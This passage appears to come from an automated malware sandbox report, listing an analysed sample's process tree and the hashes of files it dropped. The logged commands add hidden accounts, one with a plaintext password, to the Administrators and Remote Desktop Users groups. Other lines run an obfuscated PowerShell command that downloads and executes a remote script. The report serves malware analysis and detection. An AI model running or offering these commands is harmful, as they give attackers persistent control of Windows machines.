C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" JQKTJDNJ$ /ADD3⤵PID:2072
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:2868 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:3904 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:1452
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 7R4k4ROY1⤵
- Suspicious use of WriteProcessMemory
PID:2976 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 7R4k4ROY2⤵
- Suspicious use of WriteProcessMemory
PID:1464 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 7R4k4ROY3⤵PID:2100
-
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵PID:3404
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
PID:3624
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:1544
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
PID:3484
-
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:644
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:3644
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:3252
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
63151e4f7c3972f18a23c0e9996e14ef
SHA15d041fde6433a8ff8fc78a69fca1fd4630e3f270
SHA256cc28e327610e9deb6551c99a32a44fec86220f2840276474ded747580af850d3
SHA512f08c402f0a966cbe89fae0b5f9aa8536d6313dada788486a4db422a042769713a2896753acd47223348349b9960b5cde9470cc862668e2cdb90a6fcc1b87c8ec
-
MD5
63151e4f7c3972f18a23c0e9996e14ef
SHA15d041fde6433a8ff8fc78a69fca1fd4630e3f270
SHA256cc28e327610e9deb6551c99a32a44fec86220f2840276474ded747580af850d3
SHA512f08c402f0a966cbe89fae0b5f9aa8536d6313dada788486a4db422a042769713a2896753acd47223348349b9960b5cde9470cc862668e2cdb90a6fcc1b87c8ec
-
MD5
f6dd0fa99d8e5b525fd17125d9549350
SHA15f64b2280d7a47e8ad171829b242c6ad6d31b6dc
SHA2562759e4779eacbc2429d5269eb552bf91a01160fc7fc99918e577bb53f70071e0
SHA5122abb092ca26451dd3738aa18c22146c70b87877a60f758c5a5aeb4dd847bf0dbd050cfad781d4c45355af8dd3e25e2204d6fcb31cf0af0ad8f0d265dc4d4ae3d
-
MD5
f783019c5dc4a5477d1ffd4f9f512979
SHA137c8d1e5dd2ebce647c4e0a92f8598ebf2fdcc7b
SHA2564c81fee866a87b2de6e10640fe094f0db29258014177e294ac94a819940f5348
SHA51264d90352f4466f0097dd2c7ace8ccb155947dda8ae148c8c6ba1507a9e879247fab2eba452c812ba628a65de93cc096dabfcb23d2be4b525a92e5ef9e4b57d6a
-
MD5
28d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
MD5
0d91ef9d0c7240f18b1f0034c83e9442
SHA1424b9ce651b00654b854cbb860db41928bdd2050
SHA256a601c23564f705a495809269fcfe5d060db7fce67c56fa23a154197408c7e48d
SHA512eecc2603fbedc359596a361433a469dc50c182ea6aac4db82025f293f80c2b0083fad7c49d2afdbc9fa7bef9279f4b2e863971ad63ba0fde93af0e47991a568a
-
MD5
53d1652265126fb9fbd57bcf94db6332
SHA1638f8be982e347e30285a6339089fb53f77b1aaf
SHA256909be84aba5ee2db938ea1791aab4bd8d3028d7f74a0aed167ce095d897f7fc7
SHA512fda7737753fe7e6f53ccfb72891c657d86285bbce1ebd2a93fb670f4448ecf1ac46e320b933d7b603f36c29c1edc1c81256fbf348079492492d15a342dcdb5dd
-
MD5
9f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
MD5
34b7d82141e4e51ddd2028eae2b27f12
SHA1de8906ba6a40ca7f9161aa5fdfb5f6cdc9794114
SHA256ee78c599d9f89623c9082a49d7913e21e9dff5adc4e7af18cdb27558521fc401
SHA51278585e6134fa3d6f20d48a94812e2c96396eb80290f9a72afe8a20cdf96f88dd47529836d483b36c2014a4425497528f4cc976dd65debb1ba4bc6cd695e46933
-
MD5
ac13d804585a74dc542db4ec94da39df
SHA18642ae2e04e492700caf41b43de9ef9d8b3c26f9
SHA25684c41dc018689fcb2fc4240f1e0267a5ee82232e3bcd541f5f5bed4139cfcd55
SHA5120ba869487fda38d398903df4235bd8f2d0f8fb774b559125ba278751a5a503adbb0557f9ea2fde5fecba4f1a33b71583be36fac0f6f8842cbee0bdd7ea2fb5bf
-
MD5
9151c95451abb048a44f98d0afac8264
SHA122f447b210eb25c11be5a9c31f254f5f2bd50a78
SHA2568082bfe8a9f63854d6317cf6ddc0c18c54140ee5d179a96bfe9900c90d994518
SHA512728b140e68dcb6751cccb4d1046ac61f63e8db13d4f613b44e161d457f107acc11b3275167c7b4dff34a6d5966116ecb062f94713d0cf4f35b327d14ec7cbd13